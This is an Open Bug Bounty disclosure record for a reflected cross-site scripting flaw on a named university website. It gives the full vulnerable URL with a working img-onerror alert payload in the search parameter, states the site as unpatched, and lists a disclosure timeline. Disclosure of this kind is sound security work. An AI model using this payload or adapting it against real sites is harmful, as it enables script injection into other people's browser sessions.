carnegieclassifications.iu.edu XSS vulnerability

2017-04-12T15:22:00
ID OBB:224466
Type openbugbounty
Reporter BlueScreenIT
Modified 2017-05-25T08:15:00

Description

Vulnerable URL:
http://carnegieclassifications.iu.edu/lookup/srp.php?limit=0%2C50&clq;=&start;_page=lookup.php&backurl;=lookup.php&search;_string=%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%2FOPENBUGBOUNTY%2F)%3E\&submit;=FIND
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4127
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 April, 2017 15:22 GMT
Generic security notifications sent to website owner| 13 April, 2017 08:07 GMT
Vulnerability details disclosed by researcher| 25 May, 2017 08:15 GMT